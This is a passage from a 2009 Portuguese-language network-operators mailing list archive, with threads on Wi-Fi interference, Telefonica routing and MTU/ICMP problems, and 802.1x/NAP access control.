antena ? praticamente a mesma que para wifi, afinal ? s? 4% de diferen?a. From racm at centroin.com.br Wed Jun 17 15:09:45 2009 From: racm at centroin.com.br (Roberto Machado) Date: Wed, 17 Jun 2009 16:09:45 -0200 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <20090617180719.M4125@centroin.com.br> Salve! Olha, eu lembro de ter ouvido falar alguma coisa a esse respeito na Security Now. Estas desconex?es s?o um poss?vel comportamento do Wireless Zero Configuration. Para maiores detalhes: http://www.grc.com/sn/sn-134.htm (procure pela string Zero Configuration) H? um utilit?rio tamb?m para desligar o servi?o (wizmo wanlock). []s, Roberto ---------- Original Message ----------- From: Itamar Reis Peixoto To: Grupo de Trabalho de Engenharia e Operacao de Redes Sent: Wed, 17 Jun 2009 14:01:37 -0300 Subject: Re: [GTER] "Clash" de canais no Wi-Fi. > e' mais provavel que seja uma parede no meio do caminho do que o canal. > > 2009/6/17 MARLON BORBA : > > Srs., > > > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > > GTER. > > > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > > maior parte do tempo estou conectado. No entanto, em alguns instantes, > > acontecem inexplic?veis quedas da comunica??o. > > > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > > Paulista :P) operando no mesmo canal, que ? o 6. > > > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > > > > -- > > > > Abra?os, > > > > Marlon Borba, CISSP, APC DataCenter Associate > > T?cnico Judici?rio ? Seguran?a da Informa??o > > Comiss?o Local de Resposta a Incidentes - CLRI > > TRF 3 Regi?o > > (11) 3012-1581 > > -- > > Practically no IT system is risk free. > > (NIST Special Publication 800-30) > > -- > > > > -- > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > > > -- > ------------ > > Itamar Reis Peixoto > > e-mail/msn: itamar at ispbrasil.com.br > sip: itamar at ispbrasil.com.br > skype: itamarjp > icq: 81053601 > +55 11 4063 5033 > +55 34 3221 8599 > -- > gter list https://eng.registro.br/mailman/listinfo/gter ------- End of Original Message ------- From boniek.morais at gmail.com Wed Jun 17 15:12:50 2009 From: boniek.morais at gmail.com (Boniek Morais) Date: Wed, 17 Jun 2009 15:12:50 -0300 Subject: [GTER] CTBC internacional In-Reply-To: References: <4A3698F5.9090804@onda.psi.br> <4A379D74.15A6.0046.0@trf3.jus.br> <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> Message-ID: Estamos com o mesmo problema aqui. Mas o problema est? em rotas que usam a telef?nica. MSN n?o conecta e muitos sites internacionais n?o abrem. 2009/6/17 Giovane Heleno > Estou com problemas tamb?m. > Mas nos testes que fiz, me parece que ? na rota que sai pela > telefonica-wholesale.net > > Veja se ? o seu caso tamb?m. > > Giovane Heleno > Datacenter Manager > Wideway do Brasil Ltda. > www.wideway.com.br > > 2009/6/16 Adigital : > > Senhores > > > > estamos com problemas em rotas internacionais com CTBC > > > > mais alguem com o mesmo problema ? > > > > Obrigado > > > > Eugenio > > Teleon > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Boniek Morais MAIL: boniek.morais at gmail.com MSN: boniek.morais at hotmail.com Skype: boniek.morais From emota at emota.com.br Wed Jun 17 15:22:24 2009 From: emota at emota.com.br (Eduardo Mota) Date: Wed, 17 Jun 2009 15:22:24 -0300 Subject: [GTER] =?iso-8859-1?q?Por_falar_em_Telef=F4nica=2E=2E=2E?= In-Reply-To: References: Message-ID: <4A393460.8000504@emota.com.br> Problemas com a Telef?nica, nunca ... "o problema deve ser ai!". Loss% Snt Last Avg Best Wrst StDev 5. 201-28-249-245.customer.tdatabrasil.net.br 0.0% 109 4.1 3.2 2.3 8.1 0.7 6. GE-5-0-114-te-br-spo-ib-ra1.bbone.tdatabrasil.net.br 0.0% 109 3.5 3.3 2.4 13.1 1.1 7. 200-148-181-90.customer.tdatabrasil.net.br 0.9% 109 6.4 10.9 5.3 123.5 15.6 8. 6.2.186.200.sta.impsat.net.br 1.8% 109 9.6 52.2 5.8 521.3 101.2 9. 94.13.186.200.sta.impsat.net.br 1.8% 109 7.7 12.4 6.9 126.6 16.0 Loss% Snt Last Avg Best Wrst StDev 5. 201-28-249-245.customer.tdatabrasil.net.br 0.0% 116 6.4 5.1 3.5 10.4 1.2 6. GE-4-0-113-te-br-spo-ib-ra1.bbone.tdatabrasil.net.br 0.0% 116 4.7 4.9 3.5 8.4 0.9 7. 200-148-181-90.customer.tdatabrasil.net.br 3.4% 116 149.6 126.1 118.2 150.0 5.6 8. 6.2.186.200.sta.impsat.net.br 6.0% 116 152.6 157.6 119.8 680.6 88.9 9. 94.13.186.200.sta.impsat.net.br 2.6% 116 151.0 128.0 122.3 151.0 4.9 10. maisveloz.com.br 4.3% 115 149.5 129.5 122.5 152.0 5.5 From alexandre at onda.psi.br Wed Jun 17 15:27:09 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Wed, 17 Jun 2009 15:27:09 -0300 Subject: [GTER] CTBC internacional In-Reply-To: <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> References: <4A3698F5.9090804@onda.psi.br> <4A379D74.15A6.0046.0@trf3.jus.br> <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> Message-ID: <4A39357D.4060303@onda.psi.br> ctbc aqui ok.. Adigital wrote: > Senhores > > estamos com problemas em rotas internacionais com CTBC > > mais alguem com o mesmo problema ? > > Obrigado > > Eugenio > Teleon > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From welisson at conectcor.com.br Wed Jun 17 15:37:54 2009 From: welisson at conectcor.com.br (Welisson) Date: Wed, 17 Jun 2009 15:37:54 -0300 Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas com Link Telefonica] Message-ID: <4A393802.8020303@conectcor.com.br> Boa tarde a todos Caros colegas, sei que muita gente esses ?ltimos dias at? meses, tem comentado-se muito sobre a TELEFONICA. Ent?o gostaria de saber se algu?m mais est? sofrendo com baixa performance da mesma, com sa?das internacionais. Att.. -- Welisson Tom? From jeansilva at mmcb.com.br Wed Jun 17 15:30:48 2009 From: jeansilva at mmcb.com.br (Jean Tomaz) Date: Wed, 17 Jun 2009 15:30:48 -0300 Subject: [GTER] RES: seguran?a de acesso fisico na rede References: Message-ID: <1D4311107CB143ADB1855B8B33FBF385@mmcb.intranet> Eu recomendaria usar NAP, pois os agentes jah sao nativos nas estacoes que sao Windows XP SP3 e Vista. Nao necessita instalar e podem ser ativados via Active Directory. Lembrando que a melhor solucao eh 802.1x com Vlans dinamicas(RFC 3580), onde seria criado uma vlan de isolamento para as maquinas que nao pertecem ao meu Dominio( ex: terceiros ) e uma vlan para os usuarios. As politicas devem ser da seguinte forma no servidor Radius, no caso do NAP, o Network Policy Server do Windows 2008. 1 - A estacao nao possui agente ( not-compliant ) ent?o vai para vlan de isolamento. 2 - A estacao possui agente , mas o antivirus nao funciona ,ent?o vai para vlan de isolamento. 3 - A estacao possui agente, o antivirus esta funcionando e o usuario pertence ao grupo ( RH,Engenharia,etc ) do meu Dominio Windows, entao vai para vlan de usuarios. Dessa forma eh possivel controlador acesso ao meio fisico. Na vlan de isolamento eh aplicado Access-list ( ex: any any deny icmp ) dessa forma mesmo que coloque ip fixo o terceiro nao tera acesso. Atencisoamente, Jean Tomaz -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de gter-request at eng.registro.br Enviada em: quarta-feira, 17 de junho de 2009 12:00 Para: gter at eng.registro.br Assunto: gter Digest, Vol 75, Issue 57 Send gter mailing list submissions to gter at eng.registro.br To subscribe or unsubscribe via the World Wide Web, visit https://eng.registro.br/mailman/listinfo/gter or, via email, send a message with subject or body 'help' to gter-request at eng.registro.br You can reach the person managing the list at gter-owner at eng.registro.br When replying, please edit your Subject line so it is more specific than "Re: Contents of gter digest..." Today's Topics: 1. Re: seguran?a de acesso fisico na rede (MARLON BORBA) 2. Re: MTU x Telefonica (Raphael Costa) 3. Banda larga clandestina substitui lan houses na periferia de SP (Edinilson - ATINET) ---------------------------------------------------------------------- Message: 1 Date: Tue, 16 Jun 2009 13:26:12 -0300 From: "MARLON BORBA" Subject: Re: [GTER] seguran?a de acesso fisico na rede To: "Grupo de Trabalho de Engenharia e Operacao de Redes" , "Itamar Reis Peixoto" Message-ID: <4A379D74.15A6.0046.0 at trf3.jus.br> Content-Type: text/plain; charset=Windows-1252 ..e compat?veis com autentica??o 802.1x. Uma solu??o tamb?m seria o uso de NAC, mas isso ? bem complexo, depende de agentes nas esta??es, pol?ticas de "compliance" internas... -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 15/6/2009 ?s 15:58, Itamar Reis Peixoto gravou: > basicamente e' isto. > > > aconselho tamb?m que ele troque todos os seus switch's por swiches > gerenciaveis > > > 2009/6/15 Alexandre J. Correa - Onda Internet : >> Boa tarde !! >> >> Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me >> explicou a seguinte situa??o: >> >> - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp >> na rede onde atribui ips automaticamente... esta maquina vai ficar fora do >> DOMINIO da rede sem acesso a documentos etc etc.. >> >> a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar >> nada, mesmo a pessoa colocando um ip manualmente... >> >> para este caso sugeri autentica??o via 802.1x de todas as esta??es, >> incluindo o switch fazer a autentica??o em um servidor central de chaves >> usando radius... >> >> existem outras possibilidades ? >> >> uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar >> quais macs podem conectar fisicamente naquelas portas ? >> >> resumindo, ele precisa permitir conexao fisica somente a maquinas >> autorizadas .. alguem conhece alguma solu??o ? >> >> >> obrigado !! >> >> -- >> Sds. >> >> Alexandre Jeronimo Correa >> >> Onda Internet >> www.onda.net.br >> IPV6 READY ! >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > ------------------------------ Message: 2 Date: Tue, 16 Jun 2009 16:48:17 -0300 From: Raphael Costa Subject: Re: [GTER] MTU x Telefonica To: Grupo de Trabalho de Engenharia e Operacao de Redes Message-ID: <1245181697.13436.17.camel at inuyasha> Content-Type: text/plain; charset="UTF-8" Entramos em um loop infinito aqui: 1 - Reclamamos. 2 - Telefonica diz que n?o encontrou nada e sobe para a TIWS. 3 - TIWS diz que nao encontrou nada. 4 - Telefonica liga informando que a TIWS mexeu em algo (famoso roteador de Santos) e pede para testar. 5 - Tudo funciona por umas horas e o problema volta a ocorrer. 6 - Voltamos ao item #1. :-) On Mon, 2009-06-15 at 09:20 -0300, Felipe Rayel wrote: > Ser? que alguem aqui est? tendo o mesmo problema que eu? > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar > e-mail ou acessar o site do meu servidor. O outlook come?a a baixar os > e-mails e trava. Igual como se o MTU n?o estivesse correto. Ja pedi para > realizarem o teste com o telnet na porta 110 e ocorre o mesmo problema. > > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O > voip que ? via UDP funciona normalmente. > > J? tentamos ligar na telefonica, s? que o checklist padr?o dos > atendentes n?o detecta este problema, pois eles conseguem navegar > normalmente. O problema s? ocorre com o meu servidor. J? descartei a > hip?tese de ser problema aqui, pois os demais clientes na BRtelecom, > etc, n?o tem tido este problema. > > Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em > 1350.. Curiosamente passou a funcionar tudo. > > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a > Telefonica? Visto que pelo 0800 n?o consegui. > > Segue um traceroute de um cliente at? o meu servidor > > 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms > 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms > 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * > 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms > 211.082 ms 208.803 ms > 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms > 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms > 207.880 ms 208.880 ms > 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 > ms 210.797 ms 212.841 ms > 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms > 187.203 ms 193.537 ms > 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br > (201.18.252.110) 183.577 ms 211.051 ms 182.280 ms > 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br > (201.18.251.196) 178.779 ms 181.512 ms 179.809 ms > 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 > ms 308.261 ms > 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms > 201.248 ms > > -- > gter list https://eng.registro.br/mailman/listinfo/gter ------------------------------ Message: 3 Date: Wed, 17 Jun 2009 10:44:24 -0300 From: "Edinilson - ATINET" Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP To: , "Grupo de Trabalho de Engenharia e Operacao de Redes" , Message-ID: Content-Type: text/plain; charset="iso-8859-1" http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1190644-5605,00-BANDA+LARGA+CLAN DESTINA+SUBSTITUI+LAN+HOUSES+NA+PERIFERIA+DE+SP.html ------------------------------ -- gter digest list https://eng.registro.br/mailman/listinfo/gter End of gter Digest, Vol 75, Issue 57 ************************************ From vbenincasa.listas at gmail.com Wed Jun 17 16:05:16 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Wed, 17 Jun 2009 16:05:16 -0300 Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas comLink Telefonica] References: <4A393802.8020303@conectcor.com.br> Message-ID: SIM! Telec?mica j? virou motivo de piada, falhas atr?s de falhas, desculpas esfarrapadas, perda de tempo e preju?zo para todos! Hoje ouvi uma reportagem na CBN sobre o mais novo problema da semana... Ligaram duas vezes l?, cada atendente falou uma coisa totalmente diferente. E no final a Telef?nica se pronunciou alegando informa??o equivocada dos atendentes. O caos, desinforma??o, p?ssima qualidade e desrespeito imperam l?. -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Welisson" To: Sent: Wednesday, June 17, 2009 3:37 PM Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas comLink Telefonica] Boa tarde a todos Caros colegas, sei que muita gente esses ?ltimos dias at? meses, tem comentado-se muito sobre a TELEFONICA. Ent?o gostaria de saber se algu?m mais est? sofrendo com baixa performance da mesma, com sa?das internacionais. Att.. -- Welisson Tom? -- gter list https://eng.registro.br/mailman/listinfo/gter From vbenincasa.listas at gmail.com Wed Jun 17 16:32:12 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Wed, 17 Jun 2009 16:32:12 -0300 Subject: [GTER] MTU x Telefonica References: <4A33AE1B.7010106@jarruda.com><4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br><6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> Message-ID: <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> Giovane, Prov?vel que j? tenhamos trocados mensagens, ou at? nos conhecido por esse mundinho pequeno, talvez em eventos do GTER/GTS? Sobre o problema, agrade?o muito as dicas. Ele, por?m, pode ser reproduzido por qualquer cliente de e-mail, por telnet, etc. O fato ? que ap?s o comando "RETR x" os pacotes n?o chegam mais ao servidor e nem ao cliente, possivelmente por algum filtro da Telec?mica. Atrav?s de qualquer outra conex?o funciona, s? em *algumas* conex?es speedy ip fixo e links dedicados que n?o. Isso independe da conta de e-mail, ? relacionado somente a conex?o, e acontece sempre ap?s a tentativa de baixar as mensagens (RETR). O ?ltimo cliente solicitou troca de IP e resolveu, mas temos casos que o cliente n?o pode trocar o IP. E a porcaria da Telefonica alega n?o ter qualquer problema, j? que o ping trafega normalmente (desconhecem as diferen?as entre tipos de pacotes e servi?os). No caso de clientes que n?o podem trocar o IP, vamos sugerir baixar o MTU, j? que outros colegas da lista comentaram que isso ajuda. Abra?o, -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Giovane Heleno" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Wednesday, June 17, 2009 3:00 PM Subject: Re: [GTER] MTU x Telefonica Ol? Victor, Seu sobrenome n?o me ? estranho. Nos conhecemos de outras listas? rss... Seguinte... j? passei por esse problema. Se por telnet na porta 110 voc? consegue normalmente, mas pelo outlook n?o, fa?a este teste se for outlook express... Verifique se o codigo de erro ? 0x800CCC0F, se for, v? para a pasta de dados do outlook e localize o arquivo Pop3uidl.dbx. Feche o outlook e renomeie ou delete-o. O outlook criar? um novo ao abrir novamente e far? a conex?o com sucesso. Este arquivo o Outlook utiliza para controlar as conex?es POP3. O erro ocorre quando o Outlook ou alguma instabilidade na coenx?o faz com que o arquivo fique corrompido. Se o c?digo do erro for outro, informe pra gente tentar descobrir. E se manualmente tamb?m teve problemas ao baixar uma mensagem espec?fica, verifique se esta mensagem n?o est? corrompida no servidor. Tente apag?-la pelo webmail. J? utilizei um servidor de email que dava estes sintomas (hmailserver). Abra?os, Giovane Heleno Wideway do Brasil Ltda. www.wideway.com.br 2009/6/16 Victor Benincasa : > Mesmo problema aqui com um cliente, que n?o consegue receber e-mails, > entretanto, > consegue acessar outros servi?os nossos normalmente (http, smtp, etc). > > Fizemos v?rios testes atrav?s da rede do cliente, inclusive simulamos uma > conex?o > manual ao servidor pop [1], e a conex?o ? realizada normalmente > (autentica??o e > listagem de mensagens [2]), mas a comunica??o para ap?s a tentativa de > baixar > qualquer mensagem [3]. Verificando os logs do outlook, a conex?o para no > mesmo > ponto, a? ele mostra a mensagem "timeout - o servidor n?o respondeu em x > segundos..." > > Eliminamos qualquer interfer?ncia poss?vel (firewall, roteador, modem, > etc). > Tentamos > tamb?m conex?o atrav?s de porta alternativa (995), usando SSL inclusive, > mas > o > problema persiste, restou mesmo algum problema ou filtro da Telec?mica. > > Sugerimos ao cliente ligar para eles e solicitar uma troca de IP para ver > se > ajuda > (o IP dele ? fixo), s? que at? para isso o suporte deles d? canseira! > > [1] telnet host 110 > [2] comandos USER / PASS e LIST > [3] comando RETR msg > > -- > Victor Benincasa > http://netbit.com.br > > > ----- Original Message ----- From: "Leandro Keffer" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Tuesday, June 16, 2009 12:03 AM > Subject: Re: [GTER] MTU x Telefonica > > > Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no > link telefonica, a qual alega nao ter nenhuma problema > O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, > mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, > tentarei em um horario idle da empresa para muar o mtu e fazer o teste com > o > ip anterior que ocorria o problema > > > 2009/6/15 Felipe Rayel > >> >> Ser? que alguem aqui est? tendo o mesmo problema que eu? >> Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail >> ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e >> trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem >> o >> teste com o telnet na porta 110 e ocorre o mesmo problema. >> >> O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O >> voip >> que ? via UDP funciona normalmente. >> >> J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes >> n?o detecta este problema, pois eles conseguem navegar normalmente. O >> problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser >> problema aqui, pois os demais clientes na BRtelecom, etc, n?o tem tido >> este >> problema. >> >> Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em >> 1350.. Curiosamente passou a funcionar tudo. >> >> Alguem sabe como posso solucionar isso ou tentar entrar em contato com a >> Telefonica? Visto que pelo 0800 n?o consegui. >> >> Segue um traceroute de um cliente at? o meu servidor >> >> 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms >> 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms >> 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * >> 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms >> 211.082 ms 208.803 ms >> 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms >> 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms >> 207.880 ms 208.880 ms >> 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 ms >> 210.797 ms 212.841 ms >> 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms >> 187.203 ms 193.537 ms >> 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) >> 183.577 ms 211.051 ms 182.280 ms >> 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) >> 178.779 ms 181.512 ms 179.809 ms >> 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 ms >> 308.261 ms >> 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms 201.248 >> ms >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From itamar at ispbrasil.com.br Wed Jun 17 18:02:36 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Wed, 17 Jun 2009 18:02:36 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> Message-ID: j? que estamos falando de MTU, no ipv6 o MTU e' negociado automaticamente. ent?o daqui um tempo quando o ipv6 estiver largamente utilizado os problemas de MTU ir?o acabar. 2009/6/17 Victor Benincasa : > Giovane, > > Prov?vel que j? tenhamos trocados mensagens, ou at? nos conhecido por > esse mundinho pequeno, talvez em eventos do GTER/GTS? > > Sobre o problema, agrade?o muito as dicas. Ele, por?m, pode ser reproduzido > por qualquer cliente de e-mail, por telnet, etc. O fato ? que ap?s o comando > "RETR x" os pacotes n?o chegam mais ao servidor e nem ao cliente, > possivelmente por algum filtro da Telec?mica. Atrav?s de qualquer outra > conex?o funciona, s? em *algumas* conex?es speedy ip fixo e links dedicados > que n?o. Isso independe da conta de e-mail, ? relacionado somente a conex?o, > e acontece sempre ap?s a tentativa de baixar as mensagens (RETR). > > O ?ltimo cliente solicitou troca de IP e resolveu, mas temos casos que o > cliente n?o pode trocar o IP. E a porcaria da Telefonica alega n?o ter > qualquer problema, j? que o ping trafega normalmente (desconhecem > as diferen?as entre tipos de pacotes e servi?os). > > No caso de clientes que n?o podem trocar o IP, vamos sugerir baixar o MTU, > j? que outros colegas da lista comentaram que isso ajuda. > > Abra?o, > > -- > Victor Benincasa > http://netbit.com.br ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From danton at inexo.com.br Wed Jun 17 18:06:52 2009 From: danton at inexo.com.br (Danton Nunes) Date: Wed, 17 Jun 2009 18:06:52 -0300 (BRT) Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> Message-ID: On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > j? que estamos falando de MTU, no ipv6 o MTU e' negociado automaticamente. hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no IPv4 tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num fununcia! From renato.diogo at gmail.com Wed Jun 17 18:18:18 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Wed, 17 Jun 2009 18:18:18 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> Message-ID: <724d72960906171418n27bd4fau88876465e4fe7661@mail.gmail.com> Existe um algoritmo para a negocia??o de MTU em IPv4 (n?o sei se est?o usando o mesmos principios no IPv6). O IPv4, usa-se o ICMP tip3, c?digo4 para isso. E pode ser barrando esse pacote ICMP que a coisa se complica. Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/17 Danton Nunes : > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > >> j? que estamos falando de MTU, no ipv6 o MTU e' negociado automaticamente. > > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no IPv4 > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > fununcia! > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From itamar at ispbrasil.com.br Wed Jun 17 18:20:12 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Wed, 17 Jun 2009 18:20:12 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <724d72960906171418n27bd4fau88876465e4fe7661@mail.gmail.com> References: <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <724d72960906171418n27bd4fau88876465e4fe7661@mail.gmail.com> Message-ID: e' no ipv6 continua por ICMP e como o Danton disse, se bloquear o ICMP ai n?o funfa. 2009/6/17 Renato de Oliveira Diogo : > Existe um algoritmo para a negocia??o de MTU em IPv4 (n?o sei se est?o > usando o mesmos principios no IPv6). O IPv4, usa-se o ICMP tip3, > c?digo4 para isso. > > E pode ser barrando esse pacote ICMP que a coisa se complica. > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/17 Danton Nunes : >> On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: >> >>> j? que estamos falando de MTU, no ipv6 o MTU e' negociado automaticamente. >> >> hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no IPv4 >> tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num >> fununcia! >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From fneves at registro.br Wed Jun 17 18:55:46 2009 From: fneves at registro.br (Frederico A C Neves) Date: Wed, 17 Jun 2009 18:55:46 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> Message-ID: <20090617215546.GJ79676@registro.br> On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado automaticamente. > > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no IPv4 > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > fununcia! Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este problema e o resultado foi o m?todo alternativo descrito na 4821. Apesar de STD n?o encontrei refer?ncia alguma para implementa??es o que n?o ? um bom sinal. Fred From adelmojr at gmail.com Wed Jun 17 19:16:11 2009 From: adelmojr at gmail.com (Adelmo Junior) Date: Wed, 17 Jun 2009 19:16:11 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <20090617215546.GJ79676@registro.br> References: <4A33AE1B.7010106@jarruda.com> 